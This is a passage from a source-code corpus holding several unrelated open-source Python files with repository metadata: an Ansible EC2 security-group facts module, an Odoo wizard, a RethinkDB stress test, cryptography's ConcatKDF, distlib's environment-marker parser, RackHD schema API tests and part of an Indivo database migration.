vpc-id: vpc-12345678
# Gather facts about a security group
- ec2_group_facts:
filters:
group-name: example-1
# Gather facts about a security group by id
- ec2_group_facts:
filters:
group-id: sg-12345678
# Gather facts about a security group with multiple filters, also mixing the use of underscores as filter keys
- ec2_group_facts:
filters:
group_id: sg-12345678
vpc-id: vpc-12345678
# Gather facts about various security groups
- ec2_group_facts:
filters:
group-name:
- example-1
- example-2
- example-3
# Gather facts about any security group with a tag key Name and value Example. The quotes around 'tag:name' are important because of the colon in the value
- ec2_group_facts:
filters:
"tag:Name": Example
'''
RETURN = '''
security_groups:
description: Security groups that match the provided filters. Each element consists of a dict with all the information related to that security group.
type: list
sample:
'''
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
import traceback
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
filters=dict(default={}, type='dict')
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
region, ec2_url, aws_connect_params = get_aws_connection_info(module, boto3=True)
if region:
connection = boto3_conn(
module,
conn_type='client',
resource='ec2',
region=region,
endpoint=ec2_url,
**aws_connect_params
)
else:
module.fail_json(msg="region must be specified")
# Replace filter key underscores with dashes, for compatibility, except if we're dealing with tags
sanitized_filters = module.params.get("filters")
for key in sanitized_filters:
if not key.startswith("tag:"):
sanitized_filters[key.replace("_", "-")] = sanitized_filters.pop(key)
try:
security_groups = connection.describe_security_groups(
Filters=ansible_dict_to_boto3_filter_list(sanitized_filters)
)
except ClientError as e:
module.fail_json(msg=e.message, exception=traceback.format_exc(e))
# Turn the boto3 result into ansible_friendly_snaked_names
snaked_security_groups = []
for security_group in security_groups['SecurityGroups']:
snaked_security_groups.append(camel_dict_to_snake_dict(security_group))
# Turn the boto3 result into an ansible friendly tag dictionary
for security_group in snaked_security_groups:
if 'tags' in security_group:
security_group['tags'] = boto3_tag_list_to_ansible_dict(security_group['tags'])
module.exit_json(security_groups=snaked_security_groups)
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
| gpl-3.0 |
sodexis/odoo | addons/account_analytic_plans/wizard/analytic_plan_create_model.py | 384 | 2829 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import osv
from openerp.tools.translate import _
class analytic_plan_create_model(osv.osv_memory):
_name = "analytic.plan.create.model"
_description = "analytic.plan.create.model"
def activate(self, cr, uid, ids, context=None):
plan_obj = self.pool.get('account.analytic.plan.instance')
mod_obj = self.pool.get('ir.model.data')
anlytic_plan_obj = self.pool.get('account.analytic.plan')
if context is None:
context = {}
if 'active_id' in context and context['active_id']:
plan = plan_obj.browse(cr, uid, context['active_id'], context=context)
if (not plan.name) or (not plan.code):
raise osv.except_osv(_('Error!'), _('Please put a name and a code before saving the model.'))
pids = anlytic_plan_obj.search(cr, uid, [], context=context)
if not pids:
raise osv.except_osv(_('Error!'), _('There is no analytic plan defined.'))
plan_obj.write(cr, uid, [context['active_id']], {'plan_id':pids[0]}, context=context)
model_data_ids = mod_obj.search(cr, uid, [('model', '=', 'ir.ui.view'),('name', '=', 'view_analytic_plan_create_model')], context=context)
resource_id = mod_obj.read(cr, uid, model_data_ids, fields=['res_id'], context=context)[0]['res_id']
return {
'name': _('Distribution Model Saved'),
'view_type': 'form',
'view_mode': 'tree,form',
'res_model': 'analytic.plan.create.model',
'views': [(resource_id,'form')],
'type': 'ir.actions.act_window',
'target': 'new',
}
else:
return {'type': 'ir.actions.act_window_close'}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
isidorn/test2 | test/rdb_workloads/stress.py | 1 | 12326 | #!/usr/bin/python
import sys, os, time, signal, random, string, subprocess
from tempfile import NamedTemporaryFile
from optparse import OptionParser
sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..', '..', 'drivers', 'python')))
import rethinkdb as r
client_script = os.path.join(os.path.dirname(__file__), "stress_client.py")
parser = OptionParser()
parser.add_option("--table", dest="db_table", metavar="DB.TABLE", default="", type="string")
parser.add_option("--timeout", dest="timeout", metavar="SECONDS", default=60, type="int")
parser.add_option("--clients", dest="clients", metavar="CLIENTS", default=64, type="int")
parser.add_option("--batch-size", dest="batch_size", metavar="BATCH_SIZE", default=100, type="int")
parser.add_option("--value-size", dest="value_size", metavar="VALUE_SIZE", default=4, type="int")
parser.add_option("--workload", dest="workload", metavar="WRITES/DELETES/READS/SINDEX_READS/UPDATES/NON_ATOMIC_UPDATES", default="3/2/5/0/1/1", type="string")
parser.add_option("--host", dest="hosts", metavar="HOST:PORT", action="append", default=[], type="string")
parser.add_option("--add-sindex", dest="sindexes", metavar="constant | simple | complex | long", action="append", default=[], type="string")
(options, args) = parser.parse_args()
if len(args) != 0:
raise RuntimeError("No positional arguments supported")
# Parse out host/port pairs
hosts = [ ]
for host_port in options.hosts:
(host, port) = host_port.split(":")
hosts.append((host, int(port)))
if len(hosts) == 0:
raise RuntimeError("No rethinkdb host specified")
# Parse out and verify secondary indexes
sindexes = [ ]
for sindex in options.sindexes:
if sindex not in ["constant", "simple", "complex", "long"]:
raise RuntimeError("sindex type not recognized: " + sindex)
sindexes.append(sindex)
# Parse out workload info - probably an easier way to do this
workload = { }
workload_defaults = [("--writes", 3),
("--deletes", 2),
("--reads", 5),
("--sindex-reads", 0),
("--updates", 1),
("--non-atomic-updates", 1)]
workload_types = [item[0] for item in workload_defaults]
workload_values = options.workload.split("/")
if len(workload_values) > len(workload_types):
raise RuntimeError("Too many workload values specified")
workload_values.extend([0 for i in range(len(workload_types) - len(workload_values))])
for op, value in zip(workload_types, workload_values):
workload[op] = str(value)
for op, value in workload_defaults:
if op not in workload.keys():
workload[op] = str(value)
clients = [ ]
output_files = [ ]
def collect_and_print_results():
global output_files
# Read in each file so that we have a per-client array containing a
# dict of timestamps to dicts of op-names: op-counts
# Format is "<time>[,<op_type>,<op_count>,<op_errs>,<avg_duration>]...
results_per_client = [ ]
errors = { }
for f in output_files:
file_data = { }
for line in f:
split_line = line.strip().split(",")
op_counts = { }
op_durations = { }
if split_line[0] == "ERROR":
key = split_line[1].strip()
errors[key] = errors.get(key, 0) + 1
else:
timestamp = float(split_line[0])
for (op_name, op_count, err_count, avg_dur) in zip(split_line[1::4], split_line[2::4], split_line[3::4], split_line[4::4]):
op_counts[op_name] = (int(op_count), int(err_count))
op_durations[op_name] = int(float(avg_dur) * 1000)
file_data[timestamp] = op_counts
results_per_client.append(file_data)
# Until we do some real analysis on the results, just get ops/sec for each client
total_per_client = [ ]
averages = [ ]
durations = [ ]
ignored_results = 0
for results in results_per_client:
if len(results) < 2:
ignored_results += 1
else:
keys = sorted(results.keys())
duration = keys[-1] - keys[0]
accumulator = { }
for (timestamp, counts) in results.items():
accumulator = dict((op, map(sum, zip(accumulator.get(op, (0, 0)), counts.get(op, (0, 0))))) for op in set(accumulator) | set(counts))
total_per_client.append(accumulator)
averages.append(dict((op, accumulator.get(op, (0, 0))[0] / (duration)) for op in accumulator.keys()))
durations.append(duration)
if ignored_results > 0:
print "Ignored %d client results due to insufficient data" % ignored_results
# Get the total number of ops of each type
total_op_counts = { }
for client_data in total_per_client:
total_op_counts = dict((op, map(sum, zip(total_op_counts.get(op, (0, 0)), client_data.get(op, (0, 0))))) for op in set(client_data) | set(total_op_counts))
# Add up all the client averages for the total ops/sec
total = { }
min_ops_per_sec = { }
max_ops_per_sec = { }
for average in averages:
total = dict((op, total.get(op, 0) + average.get(op, 0)) for op in set(total) | set(average))
# Get the lowest and highest per-client ops/sec
min_ops_per_sec = dict((op, min(min_ops_per_sec.get(op, 10000000), average.get(op))) for op in set(min_ops_per_sec) | set(average))
max_ops_per_sec = dict((op, max(max_ops_per_sec.get(op, 0), average.get(op))) for op in set(max_ops_per_sec) | set(average))
if len(durations) < 1:
print "Not enough data for results"
else:
print "Duration: " + str(int(max(durations))) + " seconds"
print "\nOperations data: "
table = [["op type", "successes", "per sec min", "per sec max", "per sec total", "errors", "avg duration"]]
for op in total.keys():
table.append([op, str(total_op_counts[op][0]), str(int(min_ops_per_sec[op])), str(int(max_ops_per_sec[op])), str(int(total[op])), str(total_op_counts[op][1]), "-"])
column_widths = []
for i in range(len(table[0])):
column_widths.append(max([len(row[i]) + 2 for row in table]))
format_str = ("{:<%d}" + ("{:>%d}" * (len(column_widths) - 1))) % tuple(column_widths)
for row in table:
print format_str.format(*row)
if len(errors) != 0:
print "\nErrors encountered:"
for error in errors:
print "%s: %s" % (error, errors[error])
def finish_stress():
global clients
print "Stopping client processes..."
[client.send_signal(signal.SIGINT) for client in clients if client.poll() is None]
# Wait up to 5s for clients to exit
end_time = time.time() + 5
while len(clients) > 0 and time.time() < end_time:
time.sleep(0.1)
clients = [client for client in clients if client.poll() is None]
# Kill any remaining clients
[client.terminate() for client in clients]
collect_and_print_results()
def interrupt_handler(signal, frame):
print "Interrupted"
finish_stress()
exit(0)
def complex_sindex_fn(row, db, table):
return r.expr([row["value"]]).concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.concat_map(lambda item: [item, item, item, item]) \
.reduce(lambda acc, val: acc + val, 0)
def long_sindex_fn(row):
result = []
for i in range(32):
denom = 2 ** i
result.insert(0, r.branch(((row["value"] / denom) % 2) == 0, "zero", "one"))
return result
def initialize_sindexes(sindexes, connection, db, table):
# This assumes sindexes are never deleted
# if they are and a table is loaded, there could be problems
sindex_count = len(r.db(db).table(table).index_list().run(connection))
for sindex in sindexes:
# Sindexes are named as their type of sindex (below) plus a unique number
sindex_name = sindex + str(sindex_count)
sindex_count += 1
sindex_fn = None
if sindex == "constant":
sindex_fn = lambda x: 1
elif sindex == "simple":
sindex_fn = lambda x: r.branch(x["value"] % 2 == 0, "odd", "even")
elif sindex == "complex":
sindex_fn = lambda x: complex_sindex_fn(x, db, table)
elif sindex == "long":
sindex_fn = long_sindex_fn
else:
raise RuntimeError("Unknown sindex type")
print "Adding sindex '%s'..." % sindex_name
r.db(db).table(table).index_create(sindex_name, sindex_fn).run(connection)
# Get table name, and make sure it exists on the server
if len(options.db_table) == 0:
print "Creating table..."
random.seed()
table = "stress_" + "".join(random.sample(string.letters + string.digits, 10))
db = "test"
with r.connect(hosts[0][0], hosts[0][1]) as connection:
if db not in r.db_list().run(connection):
r.db_create(db).run(connection)
while table in r.db(db).table_list().run(connection):
table = "stress_" + "".join(random.sample(string.letters + string.digits, 10))
r.db(db).table_create(table).run(connection)
initialize_sindexes(sindexes, connection, db, table)
else:
# User-specified table
if "." not in options.db_table:
raise RuntimeError("Incorrect db.table format in --table option")
(db, table) = options.db_table.split(".")
with r.connect(hosts[0][0], hosts[0][1]) as connection:
if db not in r.db_list().run(connection):
r.db_create(db).run(connection)
if table not in r.db(db).table_list().run(connection):
r.db(db).table_create(table).run(connection)
initialize_sindexes(sindexes, connection, db, table)
# TODO: load existing keys, distribute them among clients
# TODO: fill out keys so that all keys are contiguous (for use by clients) - may be tricky
# Build up arg list for client processes
client_args = [client_script]
for (op, value) in workload.items():
client_args.extend([op, value])
for sindex in sindexes:
client_args.extend(["--sindex", sindex])
client_args.extend(["--value-size", str(options.value_size)])
client_args.extend(["--batch-size", str(options.batch_size)])
client_args.extend(["--table", db + "." + table])
# Register interrupt, now that we're spawning client processes
signal.signal(signal.SIGINT, interrupt_handler)
print "Launching client processes..."
count_width = len(str(options.clients))
progress_format = "\r[%%%dd/%%%dd]" % (count_width, count_width)
done_format = "\r[%%%ds]" % (count_width * 2 + 1) % "DONE"
# Launch all the client processes
for i in range(options.clients):
print (progress_format % (i, options.clients)),
sys.stdout.flush()
output_file = NamedTemporaryFile()
host, port = hosts[i % len(hosts)]
current_args = list(client_args)
current_args.extend(["--host", host + ":" + str(port)])
current_args.extend(["--output", output_file.name])
client = subprocess.Popen(current_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE)
clients.append(client)
output_files.append(output_file)
print done_format
print "Waiting for clients to connect..."
for i in range(options.clients):
print (progress_format % (i, options.clients)),
sys.stdout.flush()
if clients[i].stdout.readline().strip() != "ready":
raise RuntimeError("unexpected client output")
print done_format
print "Running traffic..."
for client in clients:
client.stdin.write("go\n")
client.stdin.flush()
# Wait for timeout or interrupt
end_time = time.time() + options.timeout
while time.time() < end_time:
time.sleep(1)
# Check to see if all the clients have exited (perhaps due to the cluster going down)
if not any([client.poll() == None for client in clients]):
print "All clients have exited prematurely"
break
finish_stress()
| agpl-3.0 |
zlsun/XX-Net | code/default/python27/1.0/lib/win32/cryptography/hazmat/primitives/kdf/concatkdf.py | 58 | 4109 | # This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import struct
from cryptography import utils
from cryptography.exceptions import (
AlreadyFinalized, InvalidKey, UnsupportedAlgorithm, _Reasons
)
from cryptography.hazmat.backends.interfaces import HMACBackend
from cryptography.hazmat.backends.interfaces import HashBackend
from cryptography.hazmat.primitives import constant_time, hashes, hmac
from cryptography.hazmat.primitives.kdf import KeyDerivationFunction
def _int_to_u32be(n):
return struct.pack('>I', n)
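# e.g. _int_to_u32be(1) == b'\x00\x00\x00\x01', the big-endian counter
# prepended to each hash round below.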
def _common_args_checks(algorithm, length, otherinfo):
max_length = algorithm.digest_size * (2 ** 32 - 1)
if length > max_length:
raise ValueError(
"Can not derive keys larger than {0} bits.".format(
max_length
))
if not (otherinfo is None or isinstance(otherinfo, bytes)):
raise TypeError("otherinfo must be bytes.")
def _concatkdf_derive(key_material, length, auxfn, otherinfo):
if not isinstance(key_material, bytes):
raise TypeError("key_material must be bytes.")
output = [b""]
outlen = 0
counter = 1
while (length > outlen):
h = auxfn()
h.update(_int_to_u32be(counter))
h.update(key_material)
h.update(otherinfo)
output.append(h.finalize())
outlen += len(output[-1])
counter += 1
return b"".join(output)[:length]
@utils.register_interface(KeyDerivationFunction)
class ConcatKDFHash(object):
def __init__(self, algorithm, length, otherinfo, backend):
_common_args_checks(algorithm, length, otherinfo)
self._algorithm = algorithm
self._length = length
self._otherinfo = otherinfo
if self._otherinfo is None:
self._otherinfo = b""
if not isinstance(backend, HashBackend):
raise UnsupportedAlgorithm(
"Backend object does not implement HashBackend.",
_Reasons.BACKEND_MISSING_INTERFACE
)
self._backend = backend
self._used = False
def _hash(self):
return hashes.Hash(self._algorithm, self._backend)
def derive(self, key_material):
if self._used:
raise AlreadyFinalized
self._used = True
return _concatkdf_derive(key_material, self._length,
self._hash, self._otherinfo)
def verify(self, key_material, expected_key):
if not constant_time.bytes_eq(self.derive(key_material), expected_key):
raise InvalidKey
@utils.register_interface(KeyDerivationFunction)
class ConcatKDFHMAC(object):
def __init__(self, algorithm, length, salt, otherinfo, backend):
_common_args_checks(algorithm, length, otherinfo)
self._algorithm = algorithm
self._length = length
self._otherinfo = otherinfo
if self._otherinfo is None:
self._otherinfo = b""
if not (salt is None or isinstance(salt, bytes)):
raise TypeError("salt must be bytes.")
if salt is None:
salt = b"\x00" * algorithm.block_size
self._salt = salt
if not isinstance(backend, HMACBackend):
raise UnsupportedAlgorithm(
"Backend object does not implement HMACBackend.",
_Reasons.BACKEND_MISSING_INTERFACE
)
self._backend = backend
self._used = False
def _hmac(self):
return hmac.HMAC(self._salt, self._algorithm, self._backend)
def derive(self, key_material):
if self._used:
raise AlreadyFinalized
self._used = True
return _concatkdf_derive(key_material, self._length,
self._hmac, self._otherinfo)
def verify(self, key_material, expected_key):
if not constant_time.bytes_eq(self.derive(key_material), expected_key):
raise InvalidKey
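# Usage sketch (assumes a backend object, e.g. from
# cryptography.hazmat.backends.default_backend()):
#   ckdf = ConcatKDFHash(hashes.SHA256(), length=32, otherinfo=b"context",
#                        backend=backend)
#   key = ckdf.derive(b"input key material")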
| bsd-2-clause |
Jeff-Tian/mybnb | Python27/Lib/site-packages/pip/_vendor/distlib/markers.py | 1261 | 6282 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2013 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
"""Parser for the environment markers micro-language defined in PEP 345."""
import ast
import os
import sys
import platform
from .compat import python_implementation, string_types
from .util import in_venv
__all__ = ['interpret']
class Evaluator(object):
"""
A limited evaluator for Python expressions.
"""
operators = {
'eq': lambda x, y: x == y,
'gt': lambda x, y: x > y,
'gte': lambda x, y: x >= y,
'in': lambda x, y: x in y,
'lt': lambda x, y: x < y,
'lte': lambda x, y: x <= y,
'not': lambda x: not x,
'noteq': lambda x, y: x != y,
'notin': lambda x, y: x not in y,
}
allowed_values = {
'sys_platform': sys.platform,
'python_version': '%s.%s' % sys.version_info[:2],
# parsing sys.platform is not reliable, but there is no other
# way to get e.g. 2.7.2+, and the PEP is defined with sys.version
'python_full_version': sys.version.split(' ', 1)[0],
'os_name': os.name,
'platform_in_venv': str(in_venv()),
'platform_release': platform.release(),
'platform_version': platform.version(),
'platform_machine': platform.machine(),
'platform_python_implementation': python_implementation(),
}
def __init__(self, context=None):
"""
Initialise an instance.
:param context: If specified, names are looked up in this mapping.
"""
self.context = context or {}
self.source = None
def get_fragment(self, offset):
"""
Get the part of the source which is causing a problem.
"""
fragment_len = 10
s = '%r' % (self.source[offset:offset + fragment_len])
if offset + fragment_len < len(self.source):
s += '...'
return s
def get_handler(self, node_type):
"""
Get a handler for the specified AST node type.
"""
return getattr(self, 'do_%s' % node_type, None)
def evaluate(self, node, filename=None):
"""
Evaluate a source string or node, using ``filename`` when
displaying errors.
"""
if isinstance(node, string_types):
self.source = node
kwargs = {'mode': 'eval'}
if filename:
kwargs['filename'] = filename
try:
node = ast.parse(node, **kwargs)
except SyntaxError as e:
s = self.get_fragment(e.offset)
raise SyntaxError('syntax error %s' % s)
node_type = node.__class__.__name__.lower()
handler = self.get_handler(node_type)
if handler is None:
if self.source is None:
s = '(source not available)'
else:
s = self.get_fragment(node.col_offset)
raise SyntaxError("don't know how to evaluate %r %s" % (
node_type, s))
return handler(node)
def get_attr_key(self, node):
assert isinstance(node, ast.Attribute), 'attribute node expected'
return '%s.%s' % (node.value.id, node.attr)
    def do_attribute(self, node):
        if not isinstance(node.value, ast.Name):
            # Bind 'key' even on the invalid path so the error below can
            # be raised without a NameError.
            valid = False
            key = '(unsupported attribute)'
        else:
            key = self.get_attr_key(node)
            valid = key in self.context or key in self.allowed_values
        if not valid:
            raise SyntaxError('invalid expression: %s' % key)
if key in self.context:
result = self.context[key]
else:
result = self.allowed_values[key]
return result
def do_boolop(self, node):
result = self.evaluate(node.values[0])
is_or = node.op.__class__ is ast.Or
is_and = node.op.__class__ is ast.And
assert is_or or is_and
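        # Short-circuit exactly as Python would: keep evaluating while an
        # 'and' chain stays true or an 'or' chain stays false.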
if (is_and and result) or (is_or and not result):
for n in node.values[1:]:
result = self.evaluate(n)
if (is_or and result) or (is_and and not result):
break
return result
def do_compare(self, node):
def sanity_check(lhsnode, rhsnode):
valid = True
if isinstance(lhsnode, ast.Str) and isinstance(rhsnode, ast.Str):
valid = False
#elif (isinstance(lhsnode, ast.Attribute)
# and isinstance(rhsnode, ast.Attribute)):
# klhs = self.get_attr_key(lhsnode)
# krhs = self.get_attr_key(rhsnode)
# valid = klhs != krhs
if not valid:
s = self.get_fragment(node.col_offset)
raise SyntaxError('Invalid comparison: %s' % s)
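        # Walk chained comparisons (a < b <= c) pairwise, as Python does,
        # stopping at the first pair that evaluates false.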
lhsnode = node.left
lhs = self.evaluate(lhsnode)
result = True
for op, rhsnode in zip(node.ops, node.comparators):
sanity_check(lhsnode, rhsnode)
op = op.__class__.__name__.lower()
if op not in self.operators:
raise SyntaxError('unsupported operation: %r' % op)
rhs = self.evaluate(rhsnode)
result = self.operators[op](lhs, rhs)
if not result:
break
lhs = rhs
lhsnode = rhsnode
return result
def do_expression(self, node):
return self.evaluate(node.body)
def do_name(self, node):
valid = False
if node.id in self.context:
valid = True
result = self.context[node.id]
elif node.id in self.allowed_values:
valid = True
result = self.allowed_values[node.id]
if not valid:
raise SyntaxError('invalid expression: %s' % node.id)
return result
def do_str(self, node):
return node.s
def interpret(marker, execution_context=None):
"""
Interpret a marker and return a result depending on environment.
:param marker: The marker to interpret.
:type marker: str
:param execution_context: The context used for name lookup.
:type execution_context: mapping
"""
return Evaluator(execution_context).evaluate(marker.strip())
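# --- Illustrative usage sketch (editor's addition, not part of distlib).
# The module uses relative imports, so it is meant to be imported as part
# of the package rather than run directly, e.g.:
#
#     >>> from pip._vendor.distlib.markers import interpret
#     >>> interpret("python_version >= '2.0'")
#     True
#     >>> interpret("extra == 'test'", {'extra': 'test'})
#     True
#
# The 'extra' name resolves only because it is supplied via the context
# mapping; names outside the context and allowed_values raise SyntaxError.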
| apache-2.0 |
RackHD-Mirror/RackHD | test/tests/api/v2_0/schema_tests.py | 16 | 2321 | from config.api2_0_config import *
from modules.logger import Log
from on_http_api2_0 import ApiApi as api20
from on_http_api2_0 import rest
from proboscis.asserts import assert_equal
from proboscis.asserts import assert_not_equal
from proboscis.asserts import assert_true
from proboscis.asserts import fail
from proboscis import test
from json import loads,dumps
LOG = Log(__name__)
@test(groups=['schemas_api2.tests'])
class SchemaTests(object):
def __init__(self):
self.__client = config.api_client
self.__schemaList = None
def __get_data(self):
return loads(self.__client.last_response.data)
@test(groups=['2.0.list_schemas'])
def test_list_schemas(self):
""" Testing GET /api/2.0/schemas """
api20().schemas_get()
schemas = self.__get_data()
LOG.debug(schemas,json=True)
assert_not_equal(0, len(schemas), message='Schema list was empty')
self.__schemaList = schemas
@test(groups=['2.0.get_schema'], depends_on_groups=['2.0.list_schemas'])
def test_get_schema(self):
""" Testing GET /api/2.0/schemas/{identifier} """
assert_not_equal(None, self.__schemaList)
for member in self.__schemaList:
assert_not_equal(None,member)
dataId = member.split('/api/2.0/schemas/')[1]
api20().schemas_id_get(dataId)
schema_ref = self.__get_data()
LOG.debug(schema_ref,json=True)
            assert_true('title' in schema_ref.keys(), message='title not found in schema')
            assert_true('definitions' in schema_ref.keys(), message='definitions not found in schema')
@test(groups=['2.0.get_schema_invalid'], depends_on_groups=['2.0.list_schemas'])
def test_get_schema_invalid(self):
""" Testing GET /api/2.0/schemas/{identifier} 404s properly """
assert_not_equal(None, self.__schemaList)
for member in self.__schemaList:
assert_not_equal(None,member)
try:
api20().schemas_id_get(member + '-invalid')
fail(message='did not raise exception')
except rest.ApiException as e:
assert_equal(404, e.status, message='unexpected response {0}, expected 404'.format(e.status))
break
| apache-2.0 |
sayan801/indivo_server | indivo/migrations/0016_auto__del_field_document_type.py | 3 | 52062 | # encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'Document.type'
db.delete_column('indivo_document', 'type_id')
def backwards(self, orm):
# Adding field 'Document.type'
db.add_column('indivo_document', 'type', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['indivo.DocumentSchema'], null=True), keep_default=False)
models = {
'indivo.accesstoken': {
'Meta': {'object_name': 'AccessToken', '_ormbases': ['indivo.Principal']},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Account']", 'null': 'True'}),
'carenet': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.Carenet']", 'null': 'True'}),
'expires_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'principal_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'}),
'share': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.PHAShare']"}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'token_secret': ('django.db.models.fields.CharField', [], {'max_length': '60'})
},
'indivo.account': {
'Meta': {'object_name': 'Account', '_ormbases': ['indivo.Principal']},
'account': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Principal']", 'unique': 'True', 'primary_key': 'True'}),
'contact_email': ('django.db.models.fields.CharField', [], {'max_length': '300'}),
'failed_login_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '150'}),
'last_failed_login_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'last_login_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'last_state_change': ('django.db.models.fields.DateTimeField', [], {'null': 'True'}),
'primary_secret': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True'}),
'secondary_secret': ('django.db.models.fields.CharField', [], {'max_length': '8', 'null': 'True'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'uninitialized'", 'max_length': '50'}),
'total_login_count': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'indivo.accountauthsystem': {
'Meta': {'unique_together': "(('auth_system', 'account'), ('auth_system', 'username'))", 'object_name': 'AccountAuthSystem'},
'account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'auth_systems'", 'to': "orm['indivo.Account']"}),
'auth_parameters': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True'}),
'auth_system': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['indivo.AuthSystem']"}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'accountauthsystem_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'user_attributes': ('django.db.models.fields.CharField', [], {'max_length': '2000', 'null': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '250'})
},
'indivo.accountfullshare': {
'Meta': {'unique_together': "(('record', 'with_account'),)", 'object_name': 'AccountFullShare'},
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'accountfullshare_created_by'", 'null': 'True', 'to': "orm['indivo.Principal']"}),
'id': ('django.db.models.fields.CharField', [], {'max_length': '50', 'primary_key': 'True'}),
'modified_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'auto_now_add': 'True', 'blank': 'True'}),
'record': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fullshares'", 'to': "orm['indivo.Record']"}),
'role_label': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'with_account': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fullshares_to'", 'to': "orm['indivo.Account']"})
},
'indivo.allergy': {
'Meta': {'object_name': 'Allergy', '_ormbases': ['indivo.Fact']},
'allergen_name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'allergen_name_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_name_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_name_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_type_abbrev': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_type_type': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'allergen_type_value': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'date_diagnosed': ('django.db.models.fields.DateField', [], {'null': 'True'}),
'diagnosed_by': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'fact_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['indivo.Fact']", 'unique': 'True', 'primary_key': 'True'}),
'reaction': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'specifics': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'indivo.audit': {
'Meta': {'object_name': 'Audit'},
'carenet_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {}),
'document_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'effective_principal_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'external_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'message_id': ('django.db.models.fields.CharField', [], {'max_length': '250', 'null': 'True'}),
'pha_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'proxied_by_email': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True'}),
'record_id': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'req_domain': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True'}),
